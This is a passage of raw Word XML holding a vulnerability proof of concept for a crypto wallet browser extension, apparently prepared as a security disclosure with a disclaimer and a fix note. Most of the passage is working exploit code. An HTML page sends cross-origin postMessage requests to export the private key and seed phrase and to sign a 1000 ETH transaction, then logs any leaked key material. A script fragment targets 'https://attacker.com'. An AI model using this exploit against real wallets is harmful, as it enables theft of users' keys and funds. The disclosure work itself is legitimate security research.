      </w:r>
    </w:p>
    <w:p w14:paraId="1EDBA03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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E6D8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type: "VW_REQ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADD483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params: { method: "exportPrivateKey" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7628FE5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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB3041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"https://attacker.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B092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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC1E35" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221FB46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console.log("\n\n" + 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355831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console.log("VULNERABILITY CONFIRMED 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>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137783E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console.log("</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>═</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>".repeat(80));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C39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console.log(`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F198F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SUMMARY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A4082F" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pP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VULNERABLE: Missing origin validation allows any website to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DABA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- Export private keys without consent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27283EE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- Sign transactions without confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0133D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- Steal 100% of user funds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2E09A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443644DB" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pP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FIXED: Origin validation + user confirmation prevents exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC6D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`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1244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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE000C0" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E898F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// Execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63708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demonstrateVulnerability().catch(console.error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E1E24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PoC 2: Chrome Extension Browser Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB2D7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exploit.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF585D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xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681CF85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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A706D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&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063090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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D588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&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AA4A4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&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF41D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&lt;title&gt;Verified Wallet - Security Verification Test&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE48C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&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FAA21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* {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E28C4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margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03E69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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B2A8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box-sizing: border-box;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160331F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13A0BAF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1831F86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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012D9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font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E313CD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linear-gradient(135deg, #1a1a2e 0%, #16213e 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F88B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#eee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771452D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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BA721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min-height: 100vh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6FB7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2EDA301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0374BC9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.container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074214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max-width: 1000px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722DAF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margin: 0 auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC50E7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rgba(0, 0, 0, 0.6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7F25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12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AA00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40px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F06D9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border: 2px solid #ff6b6b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9EA9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box-shadow: 0 8px 32px rgba(255, 107, 107, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F99726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CC7BC0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2586339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h1 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2876CF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#ff6b6b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB78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margin-bottom: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A494F9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font-size: 28px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980008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6EA1AB7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4B3CAFD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.disclaimer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232348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rgba(255, 107, 107, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B16EB9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border-left: 4px solid #ff6b6b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095845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15px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D53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margin-bottom: 30px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09693C8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4px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544F9C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#ffaaaa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F8A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54F1B0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709B82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.button-group {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBCF9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display: grid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3386EE7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grid-template-columns: 1fr 1fr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77A16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gap: 15px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76BEA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margin-bottom: 30px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D2A9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4D8C5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3B1781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button {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4F4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15px 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0D10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border: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554F1F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6px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57749E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cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300431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font-size: 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4CF5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font-weight: bold;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3DB9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transition: all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3BB0D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text-transform: uppercase;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FB9CB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letter-spacing: 0.5px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8014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E16EB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059136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.btn-exploit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449AFD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#ff6b6b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB43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white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182321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2AC8C15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2AE4C4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.btn-exploit:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B0E43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#ff5252;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542FA9E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box-shadow: 0 5px 20px rgba(255, 107, 107, 0.4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43951A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A30BEF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4B1B344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.btn-clear {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0FE6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#4ecdc4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D80C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#1a1a2e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E127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10C7A70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66029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.btn-clear:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4218E8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#45b7b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509313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35585D5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1A00DF4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.logs-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E83052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rgba(0, 0, 0, 0.8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A93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border: 1px solid #333;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB2DE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8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B14859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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D567C7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max-height: 500px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F12C4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overflow-y: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BA9C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font-family: 'Courier New', monospace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FED345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font-size: 13px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FE1A3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line-height: 1.6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2441832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005260A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35240C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358B09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margin-bottom: 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F47BD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10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F2B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border-left: 3px solid #666;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117337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3px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C28810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rgba(255, 255, 255, 0.02);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA0BD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15D3D5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AA3E6B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.log-entry.success {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD60B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border-left-color: #4ec9b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D19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#4ec9b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52243DC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5362760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03578F2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.log-entry.error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B17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border-left-color: #ff6b6b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A63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#ff6b6b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9663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09295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5272F4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.log-entry.info {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D0EC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border-left-color: #45b7b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCD9A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#45b7b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6FB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5DA7F53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0F77F5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.log-entry.warning {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822A45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border-left-color: #ffd700;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3406B71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color: #ffd700;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB4E1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6DEB20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6861685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.log-entry pre {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC28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rgba(0, 0, 0, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC828E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10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6CF2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margin-top: 5px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6212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3px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C387B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overflow-x: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239BB6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word-break: break-all;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6AB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57A00C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47CD03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.status-badge {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734DE7A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display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBE2C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padding: 8px 12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC2A1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border-radius: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2376E42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font-size: 12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231CAB4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font-weight: bold;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3923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margin: 10px 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D368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ED0A3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25144E9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.status-vulnerable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17176CB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#ff6b6b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B37AD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white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D087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0FBB70A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24DDE7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.status-protected {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CA67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background: #4ec9b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C0B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color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563CF9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C4E00F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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578829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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAEB8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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE9B8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&lt;div class="container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0B6F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&lt;h1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Verified Wallet Extension - Security Test&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300751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&lt;p style="margin-bottom: 5px; color: #aaa;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C527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This page tests the cross-origin message injection vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FAB0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&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA1189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1E3831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&lt;div class="disclaimer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC304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&lt;strong&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DISCLAIMER:&lt;/strong&gt; This is for authorized security testing only. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2DA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Unauthorized testing against third-party systems is illegal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529854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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DF30E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6564D8E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&lt;h2 style="margin-top: 30px; margin-bottom: 20px; color: #eee; font-size: 18px;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E0EEF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Test Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CD25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&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705E7EE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7436D38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&lt;div class="button-group"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D049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&lt;button class="btn-exploit" onclick="exploitPrivateKeyExport()"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69869B2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Test 1: Export Private Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC0AB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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3370C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&lt;button class="btn-exploit" onclick="exploitTransactionSign()"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B91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Test 2: Sign Transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2692BF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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF21C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&lt;button class="btn-exploit" onclick="exploitSeedPhrase()"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33501E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Test 3: Export Seed Phrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239F65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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F821E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&lt;button class="btn-clear" onclick="clearLogs()"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3925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Clear Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B50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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFA7A6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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037DD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3FF84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&lt;h2 style="margin: 30px 0 20px 0; color: #eee; font-size: 18px;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6325CC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Response Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34C02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&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBD4AC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4EEA72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&lt;div class="logs-container" id="logs"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E302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&lt;div class="log-entry info"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF9603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[INFO] Page loaded. Listening for wallet responses...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EE06D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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508911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&lt;div class="log-entry warning"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565494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[WARNING] If no response received, wallet extension may not be installed or active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B9501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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25430CC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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184EEB0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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269ACA6D" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B54868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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B89A3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responses = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090209C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maxLogs = 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3DD52F" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1528474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// Listen for wallet responses on the message bus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4542B15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window.addEventListener("message", (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9AA5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// Log all received messages for debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D10CD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(event.data.type === "VW_RES") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E5AD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logSuccess(`</w:t>
      </w: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WALLET RESPONSE RECEIVED`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D393A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logInfo(`Response Type: ${JSON.stringify(event.data, null, 2)}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67977EE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39EB483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responses.push(event.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E54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7C4DC87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// Check if sensitive data was leaked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1157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if (event.data.params?.data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6766E3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const data = event.data.params.data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144051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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59835FE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if (data.includes("0x") &amp;&amp; data.length &gt; 50) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003DF9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// Likely private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA56B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logError(`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VULNERABILITY CONFIRMED: PRIVATE KEY EXPORTED`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180DE74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logError(`Key Fragment: ${data.substring(0, 30)}...${data.substring(data.length - 10)}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E7CA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showBadge("VULNERABLE");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B05DF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 else if (data.includes(" ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1612BEE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// Likely seed phrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68317CE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logError(`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VULNERABILITY CONFIRMED: SEED PHRASE EXPORTED`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D91887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logError(`${data.split(" ").length} words detected`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632D930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showBadge("VULNERABLE");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666D494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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A21B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2AF8EE5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADBDE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if (event.data.params?.success === true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFBCF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logError(`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Operation succeeded without user confirmation`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A64687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4908DEB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74542C5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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3662CB" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D78E7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exploitPrivateKeyExport() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125141B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logWarning(`[TEST] Sending exportPrivateKey request...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5252DC4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logInfo(`Origin: ${window.location.origin}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD95E9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logInfo(`Target: *`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610FB08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31F4492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window.postMessage({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A6CDF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type: "VW_REQ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31380E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id: generateMessageId(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E994C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params: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21A25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method: "exportPrivateKey"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275E8A0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70E0EF0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}, "*");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003EAEE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7FC848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logInfo(`Message sent to wallet...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41906C0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scheduleTimeout("exportPrivateKey");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C066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02DE856C" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB138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exploitTransactionSign() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C6170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logWarning(`[TEST] Sending signTransaction request...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046E6D3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logInfo(`Origin: ${window.location.origin}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B60B2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67B14DD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window.postMessage({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1804757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type: "VW_REQ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1ACFC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id: generateMessageId(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A23A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params: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA70F9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method: "signTransaction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D874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transaction: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B28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to: "0x742d35Cc6634C0532925a3b844Bc5e8Cc1c22C79",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F272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value: "1000 ETH",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E8A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data: "0x",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE5B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  gasLimit: "21000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E85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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362976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6FBEDC2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}, "*");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08119E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26F709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logInfo(`Transaction signing request sent...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E446C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scheduleTimeout("signTransaction");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F661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4034D4F" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB9C5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exploitSeedPhrase() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEB53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logWarning(`[TEST] Sending exportSeedPhrase request...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510010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0A86EB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window.postMessage({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7515B79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type: "VW_REQ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31FE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id: generateMessageId(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EBB7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params: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE0DC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method: "exportSeedPhrase"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2CD5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034BE10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}, "*");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1105081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09140A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logInfo(`Seed phrase export request sent...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E232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scheduleTimeout("exportSeedPhrase");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6855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3AF5CC12" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A29F3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scheduleTimeout(testName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C3B2B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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AAE75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if (responses.length === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B2BC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logError(`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No response received from wallet for ${testName}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684AA23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logInfo(`This could mean:`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F0C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logInfo(`  1. Wallet extension not installed`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D04F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logInfo(`  2. Wallet not unlocked`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D741A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  logInfo(`  3. Origin validation is working (GOOD)`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F11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}</w:t>
      </w:r>
    </w:p>
